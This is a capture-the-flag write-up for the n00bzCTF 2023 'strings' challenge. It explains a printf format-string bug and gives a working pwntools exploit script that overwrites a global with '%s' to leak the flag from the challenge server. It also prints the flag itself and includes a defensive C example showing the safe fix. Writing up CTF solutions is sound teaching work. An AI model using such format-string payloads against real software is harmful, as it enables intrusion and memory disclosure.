Tags: format-string 

Rating:

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/297cb53c-fff0-4525-9f2c-dce146ffa433)

Disassembling with ghidra:

```c
void main(EVP_PKEY_CTX *param_1)

{
  long in_FS_OFFSET;
  char input [104];
  init(param_1);
  puts("Do you love strings? ");
  fgets(input,100,stdin);
  printf(input);                 /* format string bug: user input is the format */
  main2();
  return;
}

void main2(void)

{
  FILE *flag_stream;
  long in_FS_OFFSET;
  char real_flag [40];
  
  flag_stream = fopen("flag.txt","r");
  fgets(real_flag,40,flag_stream);   /* the real flag now sits on the stack */
  printf(fake_flag);                 /* fake_flag is a global symbol in the binary */
  return;
}
```

There is a printf format string bug at `fgets(input,100,stdin); printf(input);` in main: the user's input is passed to printf as the format string. In main2, the real_flag is read onto the stack and then `printf(fake_flag);` is called. If fake_flag could be overwritten with `%s`, that printf would print the first item on the stack, which is the real_flag. So the plan is to use the format string bug in main to overwrite fake_flag with `%s`. But first we need to find the offset at which our input appears among printf's arguments.
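As an added illustration (my own constructed example, not code from the challenge or the original writeup), the snippet below shows the vulnerable pattern from main next to its hardened form, plus a small helper that flags input containing a conversion directive. Both echo functions write into a buffer with `snprintf` so the difference in how the same input is treated can be observed directly: the vulnerable version consumes `%%` as a directive, the safe version echoes the input verbatim.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example: the same "echo" written two ways.
 * vulnerable_echo() passes user data as the format argument, exactly as
 * the decompiled main() does with printf(input); safe_echo() uses a fixed
 * format so the input is only ever treated as data. */

#define OUT_LEN 128

/* Returns the number of characters snprintf would have written. */
int vulnerable_echo(const char *input, char *out, size_t out_len) {
    /* BUG: input is the format string, so %x, %s, %n ... are interpreted */
    return snprintf(out, out_len, input);
}

int safe_echo(const char *input, char *out, size_t out_len) {
    /* The format is a constant; the input is bound to a %s parameter */
    return snprintf(out, out_len, "%s", input);
}

/* Defensive check: returns 1 if s contains a '%' that is not the literal
 * escape "%%". Handy in code review or as a log-side detector for a program
 * that should never receive format directives from a client. */
int contains_format_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }  /* "%%" is a literal percent */
        return 1;                            /* "%<anything else>" or trailing '%' */
    }
    return 0;
}

int main(void) {
    char out[OUT_LEN];
    const char *sample = "100%% sure";   /* constructed input */

    vulnerable_echo(sample, out, sizeof out);
    printf("vulnerable: %s\n", out);     /* prints "100% sure": %% was consumed */

    safe_echo(sample, out, sizeof out);
    printf("safe:       %s\n", out);     /* prints "100%% sure": echoed verbatim */

    printf("directive check: %d\n", contains_format_directive("Do you love %s?"));
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` makes GCC and Clang warn on the `snprintf(out, out_len, input)` call, which is the cheapest way to catch this class of bug before it ships; the fix in every case is the `safe_echo` shape, a literal format with the user data passed as an argument.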

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/6afff690-023f-44e5-b6ac-9f6ccfc1ed4e)

The offset is 6. Using the pwntools format string exploit builder (`fmtstr_payload`), my exploit script is:

```py
from pwn import *

elf = context.binary = ELF('strings')

r = remote("challs.n00bzunit3d.xyz", 7150)

offset = 6  # position of our input among printf's arguments (found above)

# build a format string that writes b"%s" over the fake_flag global and send it
r.sendline(fmtstr_payload(offset, {elf.symbols.fake_flag:b"%s"}))
r.recv()  # output of the first printf (our payload)

print(r.recv())  # output of printf(fake_flag) in main2, now the real flag
```

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/fdc551c6-5807-4fee-a6f4-0993ccc49cc2)

Flag: `n00bz{f0rm4t_5tr1ng5_4r3_th3_b3s7!!!!!}`

Original writeup (https://jp-ch.gq/pwn/n00bzCTF-2023.html#strings).